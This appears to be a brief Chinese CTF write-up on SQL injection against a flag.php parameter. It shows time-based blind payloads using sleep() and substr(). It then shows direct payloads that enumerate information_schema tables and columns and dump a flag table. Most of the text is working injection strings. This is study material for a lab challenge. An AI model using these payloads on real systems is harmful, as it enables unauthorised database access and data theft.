按照题意,正规思路
flag.php?type=1%20and%20if(length(database())=12,sleep(5),1)%20--+
通告sleep()函数判断数据长度
然后用flag.php?type=1%20and%20if(substr(database(),1,1)='s',sleep(5),1)%20--+
用bp字典结合substr函数爆库==>爆表==>爆字段==>爆字段值
可是这注定是个漫长的过程........
但是这条题出现了bug,可以完全不用时间盲注
以下是不用时间盲注
找到注入点,发现1的值会回显
/flag.php?type=database()'
/flag.php?type=group_concat(table_name) from information_schema.tables where table_schema=database()--+
/flag.php?type=group_concat(column_name) from information_schema.columns where table_name='flag'--+
/flag.php?type=group_concat(flag) from flag--+